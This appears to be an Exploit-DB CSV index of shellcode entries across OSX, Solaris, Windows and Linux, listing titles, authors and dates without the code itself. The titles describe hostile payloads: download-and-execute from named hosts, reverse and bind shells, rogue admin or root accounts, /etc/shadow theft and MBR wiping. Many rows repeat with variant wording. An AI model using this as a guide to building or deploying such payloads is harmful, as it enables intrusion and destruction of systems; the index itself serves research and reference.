13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot() Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
13509,shellcodes/windows_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
13510,shellcodes/windows_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
13511,shellcodes/windows_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
13518,shellcodes/windows_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
13519,shellcodes/windows_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
13520,shellcodes/windows_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
13521,shellcodes/windows_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
13522,shellcodes/windows_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
13523,shellcodes/windows_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
13524,shellcodes/windows_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
13509,shellcodes/windows_x86/13509.c,"Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
13510,shellcodes/windows_x86/13510.c,"Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
13518,shellcodes/windows_x86/13518.c,"Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
13519,shellcodes/windows_x86/13519.c,"Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
13520,shellcodes/windows_x86/13520.c,"Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
13521,shellcodes/windows_x86/13521.asm,"Windows/x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
13522,shellcodes/windows_x86/13522.c,"Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
13523,shellcodes/windows_x86/13523.c,"Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
13524,shellcodes/windows_x86/13524.txt,"Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
13635,shellcodes/windows_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86
13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86
13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
